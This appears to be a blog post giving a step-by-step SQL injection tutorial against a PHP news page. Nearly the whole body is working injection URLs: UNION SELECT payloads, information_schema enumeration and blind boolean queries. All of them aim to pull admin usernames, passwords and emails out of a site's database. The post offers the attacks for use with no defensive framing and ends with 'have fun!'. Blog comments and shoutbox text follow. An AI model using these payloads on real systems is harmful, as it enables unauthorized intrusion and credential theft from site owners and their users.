[Noevil:PHP INJECTION]
#
www.xxx.com/news.php?id=5 order by 1/*
www.xxx.com/news.php?id=5 order by 2/*
www.xxx.com/news.php?id=5 order by 3/*
www.xxx.com/news.php?id=5 order by 4/* have error
so have 3 columns ~
#
www.xxx.com/news.php?id=5 union all select 1,2,3/*
see the num on the screen~
#
we can use /* and –
or
if the number 2 on the screen
wen can do like this :
www.xxx.com/news.php?id=5 union all select 1,@@version,3/*
or
www.xxx.com/news.php?id=5 union all select 1,version(),3/*
if you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
(but i never look it )
what we need is convert()
so:
www.xxx.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()
so:
www.xxx.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
you will get mssql version~
#
if the version <5 (4.1.33 or 4.1.12…)
we must guess table and column name in most cases.
table names like:
user/s, admin/s, member/s…
column names like:
username,user,user_name,password,pass.passwd,pwd…
so:
www.xxx.com/news.php?id=5 union all select 1,2,3 from admin/*
(we see number 2 on the screen like before,and that’s good!)
so we know that table admin exists…
now to check column names.
so :
www.xxx.com/news.php?id=5 union all select 1,username,3 from admin/*
(if have error ,we must try other column name)
we get username displayed on screen ,example would be admin,or superadmin etc…
now to check if column password exists
so:
www.xxx.com/news.php?id=5 union all select 1,password,3 from admin/*
like before~
for that we can use concat()
so:
www.xxx.com/news.php?id=5 union all select 1,concat(username,0×3a,password),3 from admin/*
(0×3a is hex value for 
or char(58),ascii value for :
so:
www.xxx.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
now we get display username:password on screen.
#
mysql 5
like before ,if mysql >5
we need information_schema.it holds all tables and columns in database.
to get tables we use table_name information_schema.tables.
so:
www.xxx.com/news.php?id=5 union select 1,table_name,3 from information_schema.tables/*
to get more,we must add limit to the end of query to list out all tables.
so:
www.xxx.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
display the second table :
www.xxx.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
what’s more:
www.xxx.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
…
keep incrementing until you get some useful like db_admin,auth,auth_user etc…
to get the column names the method is the same.
here we use column_name and information_schema.columns
so:
www.xxx.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
www.xxx.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
www.xxx.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 2,1/*
…
so keep incrementing until you get something like :
username,user,login,password,pass,passwd etc…
if you wanna display column name for specific table use this query.(where clause)
let’s say that we found table users.
so:
www.xxx.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*
now we get dispalyed columns name in table users ,just using limit we can list all columns in table users.
*
that this won’t work if the magic quotes is on .
let’s get the cloumns user,pass and email.
put them all togrther
use concat()
so:
www.xxx.com/news.php?id=5 union all select 1,concat(user,0×3a,pass,0×3a,email),3 from users/*
#
blind sql injection.
www.xxx.com/news.php?id=5 and substring(@@version,1,1)=4
www.xxx.com/news.php?id=5 and substring(@@version,1,1)=5
look which is return ture.
#
when select don’t work then we use subselect .
so :
www.xxx.com/news.php?id=5 and (select 1)=1
if page loads normally then subselects work.
let go on:
www.xxx.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if return true we can go on like this:
(guess guess guess!!!)
www.xxx.com/news.php?id=5 and (select 1 from users limit 0,1)=1
如果返回正常说明存在users表。
否则就继续猜。
guess column:
www.xxx.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
如果返回正常说明存在password 列。
猜内容:(超经典)
www.xxx.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>80
判断第一个字的ascii编码。
一直变化尾部,直到出错。
www.xxx.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>98 (true)
www.xxx.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>99 (error)
so the first character in username is char(99).
that is ‘c’.
go on:
www.xxx.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),2,1))>98 (true)
…
www.xxx.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>104 (true)
www.xxx.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>105 (error)
so the second is char(105),it is ‘i’
so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).
have fun!
All comments are moderated. Your comments will not appear here unless approved by the blog owner. Thank you.
I think the things you covered through the post are quiet impressive, good job and great efforts. I found it very interesting and enjoyed reading all of it …keep it up, lovely job.
thanks You sure do know what your’e talking about. Man, this blog is just great! I cant wait to read more of what youv’e got to say. Im really happy that I came across this when I did because I was really starting
cool~
Congratulations, you’ve just completed the installation of this shoutbox.
Hi! Your shoutbox is working fine!
